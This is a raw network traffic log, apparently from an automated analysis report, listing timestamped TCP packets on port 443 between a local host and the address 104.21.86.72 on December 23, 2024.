                                                                                                                              Dec 23, 2024 06:41:06.815712929 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824003935 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824084044 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.824100971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824162006 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.828737020 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.828756094 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.828821898 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.837651014 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.837719917 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.837735891 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.837790012 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.846071005 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.846110106 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.846155882 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.854173899 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.854195118 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.854249954 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.854265928 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858355999 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858433008 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.858447075 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858505964 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.866367102 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.866449118 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.875250101 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.875354052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.883289099 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.883358955 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.887341976 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.887469053 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.895229101 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.895345926 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.899173975 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.899377108 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.903651953 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.903723001 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.907592058 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.907665014 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.936176062 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.936311960 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.937982082 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.938076019 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.007405996 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.007492065 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.008869886 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.008956909 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.016031981 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.016119957 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.019155979 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.019227982 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.025046110 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.025137901 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.027837038 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.027924061 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.033328056 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.033401012 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.036140919 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.036211967 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.041434050 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.041523933 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.046736956 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.046823978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.049535990 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.049607992 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.052184105 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.052270889 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.057440042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.057523966 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.062746048 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.062834978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.066109896 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.066190958 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.067935944 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.068006039 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.071176052 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.071249008 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.071274996 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073746920 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073831081 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.073862076 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073923111 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.077049971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.077121019 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.080420971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.080492973 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.085961103 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.086045027 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.089252949 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.089322090 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.089339972 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.129756927 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.199812889 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199836016 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199876070 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199928999 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.200072050 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.200073004 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.200115919 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.200176954 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.201226950 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.201293945 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.210763931 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.210808039 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.210897923 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.210916042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.211030006 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.211030006 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.220763922 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.220808029 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.220879078 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.220894098 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.221059084 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.221059084 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.230357885 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.230401993 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.230472088 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.230498075 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.230529070 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.230550051 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.238696098 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.238739967 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.238810062 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.238826990 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.238873005 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.238889933 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.248920918 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.248963118 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.249021053 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.249036074 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.249190092 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.249191046 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.257179976 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.257224083 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.257458925 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.257458925 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.257476091 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.257531881 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.282629967 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.282675028 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.282870054 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.282870054 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.282887936 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.282941103 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.395891905 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.395936966 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.395998955 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.396085024 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.396125078 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.396169901 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.404783010 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.404825926 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.404871941 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.404906988 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.404958010 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.404958010 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.412446022 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.412486076 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.412538052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.412554026 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.412587881 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.412587881 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.421327114 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.421366930 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.421401978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.421416044 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.421459913 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.421477079 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.430169106 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.430212021 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.430278063 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.430291891 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.430320978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.430340052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.438260078 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.438302994 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.438339949 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.438354015 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.438384056 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.438404083 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.445919037 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.445980072 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.446013927 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.446036100 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.446063042 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.446192980 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.446260929 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.449156046 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:42.289108038 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:42.289156914 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:42.289244890 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:42.312922001 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:42.312953949 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:43.541840076 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:43.541982889 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:43.591351986 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:43.591365099 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:43.592297077 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:43.592386007 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:43.595530033 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:43.643322945 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226191044 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226325035 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226392031 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.226402044 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226491928 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226547956 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.226552963 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.226607084 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.226610899 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.229628086 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.229633093 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.230297089 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.234070063 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.237477064 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.237490892 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.237538099 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.242507935 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.243701935 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.243706942 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.243808985 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.250751019 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.253325939 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.417823076 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.417993069 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.418000937 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.418065071 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.421708107 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.425518990 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.429624081 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.432795048 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.432923079 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.432928085 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.432976007 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.440664053 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.441458941 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.441462994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.441508055 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.448584080 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.449276924 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.456604004 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.457609892 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.457617998 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.457660913 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.464550018 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.464693069 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.464767933 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.464773893 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.464827061 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.472546101 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.473613977 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.480798006 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.481581926 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.481585979 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.481646061 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.488481998 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.489193916 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.489197969 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.489238024 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.495445013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.495496988 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.495527029 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.495601892 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.609771013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.612194061 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.612387896 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.612396955 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.612469912 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.616859913 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.617326975 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.617332935 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.617414951 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.621622086 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.625514030 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.625519037 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.625585079 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.626437902 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.626600981 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.626605034 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.626672029 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.635643005 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.635751009 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.644694090 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.644802094 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.644895077 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.645350933 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.654048920 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.654155970 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.662987947 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.663079023 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.672146082 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.672205925 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.677109957 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.677181959 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.685872078 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.685942888 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.801872015 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.801949978 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.808180094 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.808343887 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.812088013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.812161922 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.819518089 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.819619894 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.826908112 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.827007055 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.830739021 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.830837965 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.837984085 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.838095903 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.845449924 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.845583916 CET49737443192.168.2.4104.21.86.72
